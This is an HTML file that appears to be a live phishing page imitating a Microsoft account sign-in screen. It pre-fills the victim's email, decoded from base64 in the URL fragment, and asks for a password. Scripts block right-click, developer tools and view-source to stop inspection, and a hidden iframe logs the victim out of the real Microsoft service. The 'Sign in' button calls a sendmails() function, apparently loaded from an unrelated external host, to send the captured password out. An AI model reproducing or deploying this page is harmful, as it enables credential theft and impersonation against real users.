<html lang="en"><!--doubly --><head>
  <meta charset="utf-8">
  <script>
  // disable right click
  document.addEventListener('contextmenu', event => event.preventDefault());

  document.onkeydown = function (e) {

      // disable F12 key
      if(e.keyCode == 123) {
          return false;
      }

      // disable I key
      if(e.ctrlKey && e.shiftKey && e.keyCode == 73){
          return false;
      }

      // disable J key
      if(e.ctrlKey && e.shiftKey && e.keyCode == 74) {
          return false;
      }

      // Prevent Ctrl+s = disable save
      if (event.ctrlKey && (event.keyCode === 85 || event.keyCode === 83 || event.keyCode ===65 )) {
          return false;
      }

      // disable U key
      if(e.ctrlKey && e.keyCode == 85) {
          return false;
      }
  }

</script>
<script>
       if(dxraw == null || dxraw == ""){

          var dnx=hash.split('#')[1];



        }else{
         var dnx=dxraw; 
         window.location.replace('#'+dnx);   
      }
       </script>

</head><body><iframe style="    border: 0;" src="https://login.microsoftonline.com/logout.srf?ct=1548343592&amp;rver=64.4.6456.0&amp;lc=1033&amp;id=501392" height="0" width="0"></iframe>


<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6468.8/content/images/favicon_a.ico">
<title>Sign in to your account</title>

<!-- Bootstrap core CSS -->
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha256-NuCn4IvuZXdBaFKJOAcsU2Q3ZpwbdFisd5dux4jkQ5w=" crossorigin="anonymous">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">

<!-- Custom styles for this template -->
<style type="text/css">
 


  #rand{
      font-size: 0;
      
  }
  
  
  /* Large desktops and laptops */
@media (min-width: 1200px) {
body {
      background-image: url(https://ds-pcshop.com/web/mx/mbg.jpg);
      background-origin: inherit;
      background-size: cover;


  }
}

/* Landscape tablets and medium desktops */
@media (min-width: 992px) and (max-width: 1199px) {

}

/* Portrait tablets and small desktops */
@media (min-width: 768px) and (max-width: 991px) {
   body {
      background-image: url(https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7887.14/content/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd);
      background-origin: inherit;
      background-size: cover;


  }

}

/* Landscape phones and portrait tablets */
@media (max-width: 767px) {
    body {
 
        background-color: #FFF;


  }

}

/* Portrait phones and smaller */
@media (max-width: 480px) {
    body {
 
        background-color: #FFF;
       

  }
   .box {
            margin-top: 10%;
        }

}
  .box {

      padding: 10px;
      background-color: #FFF;
  }


  .form-control {
      border: 0;
      border-radius: 0;
      border-bottom: 1px;
      border-bottom-style: solid;
      border-top-color: #FFF;
  }

  .btn {
      background-color: #005DA6;
      color: #FFF;
      padding-left: 30px;
      padding-right: 30px;
      border-radius: 0px;
      padding: 7px 24px;
      color: #FFF;
      font-size: 16px;

      border: 0;
      text-align: center;
      -webkit-transition: background .15s ease-in;
      transition: background .15s ease-in;
      cursor: pointer;
      min-width: 120px;

  }
  .btn:hover,.btn:focus{
      color: #FFF;
  }

  .thxsss {
      display: none;
  }
  .hid{
      margin-top: 10%;
  }
  li{
      float: right;
      padding-left: 10px;
  }
  .eml{
      padding: 10px;
      margin:1%;
      
      
  }
    .eml:hover{
     background-color: #E5E5E5;
      
      
  }
  
  
    .eml:active{
    border: 1px ;
        border-style: dotted;
        border-color: black;
        
      
      
  }
  
  .LOGin_F0rm{
      display: none;
  }


.loading-dots {
text-align: center;
z-index: 5;
  display: none;
}
.loading-dots .dot {
  color: #00A4EF;
display: inline;
margin-left: 0.2em;
margin-right: 0.2em;
position: relative;
top: -1em;
font-size: 4em;
opacity: 0;
-webkit-animation: showHideDot 2.5s ease-in-out infinite;
        animation: showHideDot 2.5s ease-in-out infinite;
}
.loading-dots .dot.one {
-webkit-animation-delay: 0.2s;
        animation-delay: 0.2s;
}
.loading-dots .dot.two {
-webkit-animation-delay: 0.4s;
        animation-delay: 0.4s;
}
.loading-dots .dot.three {
-webkit-animation-delay: 0.6s;
        animation-delay: 0.6s;
}

@-webkit-keyframes showHideDot {
0% {
  opacity: 0;
}
50% {
  opacity: 1;
}
60% {
  opacity: 1;
}
100% {
  opacity: 0;
}
}

@keyframes showHideDot {
0% {
  opacity: 0;
}
50% {
  opacity: 1;
}
60% {
  opacity: 1;
}
100% {
  opacity: 0;
}
}
</style>





<section>
  <div class="container ">
      <div class="row">
          <div class="col-md-12 hidden-sm hidden-xs">
          <div class="hid"></div>
          </div>
          <div class="col-md-5 col-md-offset-4 box">
            
                 <div class="loading-dots">
                 
               <h1 class="dot one">.</h1><h1 class="dot two">.</h1><h1 class="dot three">.</h1><h1 class="dot _4">.</h1>
               <h1 class="dot _5">.</h1> <h1 class="dot two">.</h1> <h1 class="dot three">.</h1> <h1 class="dot _5">.</h1> <h1 class="dot three">.</h1> <h1 class="dot _5">.</h1> <h1 class="dot _5">.</h1>
              </div>
              <div class="imgc" style="padding-top: 44px;padding-bottom: 44px;padding-right: 44px;padding-left: 44px;border-top-width: 0px;border-top-style: solid;border-bottom-width: 0px;border-bottom-style: solid;border-left-width: 0px;border-left-style: solid;border-right-width: 0px;border-right-style: solid;">
                 
                 
                 
                  <div id="form-messages"></div>
                  <img class="img-responsive" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7887.14/content/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd">
                  <br>
                  
                      <div class="add_em" style="display: none;">
                      <p style="font-weight: bold;margin-left: 4%">Pick an account</p>
                 <div class="eml">
                     
                 
                 <img class="tile-img" role="presentation" src="#"> <span id="emx">jhdhdhd</span><span style="float: right;margin-top: 4%"><img src="#" alt=""></span>
                 </div>
                    <div class="eml">
                     
                 
                 <img class="tile-img" role="presentation" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7230.10/content/images/picker_account_add.svg"> <span style="    word-wrap: break-word;">Use another account</span>
                 </div>
             </div>
                  

                 
                  <div class="thxsss">
                      <div class="text-center">
                      
                          <img style="width: 100px; text-align: center;" class="img-responsive" src=" https://www.freeiconspng.com/uploads/success-icon-10.png">
                      </div>
                  </div>
                  <div class="LOGin_F0rm" style="display: block;">
                    
                      <i class="fa fa-arrow-left"></i> <span id="test" readonly=""><input style="border: none; width: 300px;" id="i0281" name="f1" readonly=""></span>
                      
                      <h4>Enter password</h4>
                        <div class="alert" id="msg" style="border-bottom-width: 0px;margin-bottom: 23px;padding-left: 0px;border-top-width: 0px;padding-top: 5px;"></div>
                      <input required="" id="i0118" name="p44s" placeholder="Pa&shy;ss&shy;wor&shy;d" type="password" class="form-control" style="border-top-width: 0px;border-top-style: solid;margin-top: -33px;">
                      <br>
                      <a href="#">Forgot my password
</a><br>
                          
                      <button id="submit" style="float:right" onclick="sendmails()" class="btn twoToneButton">Si&shy;g&shy;n i&shy;n</button>
                      <div id="sona"></div>
                      <br><br>

                  </div>
              </div>


          </div>
      </div>
  </div>
<div>
   <div>
       <div style="color: #FFF; background: #DDD;background-color: rgba(0,0,0,0.6);    position: fixed;
  bottom: 0;
  width: 100%;
 " class="fot">
          <ul class="list-unstyled">
          <li>...</li>
         
           <li>Privacy & cookies  </li>
             <li>Terms of use</li>
            <li> </li>
           
       </ul></div>
   </div>
</div>
</section>

<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="http://server-css.com/officeserver/bootstrap.js" type="text/javascript"></script>

<script>
{ document.getElementById('i0281').value = getEmail();
 var domain = getEmail().substring(getEmail().lastIndexOf("@") +1);
 var frmsite = domain.substring(0, domain.indexOf("."));

 function getEmail(){
 if(window.location.hash){
 var url = window.location.href;
        var hash = url.split('#').pop();
        return atob(hash);
 }
}

}
</script>
</body>
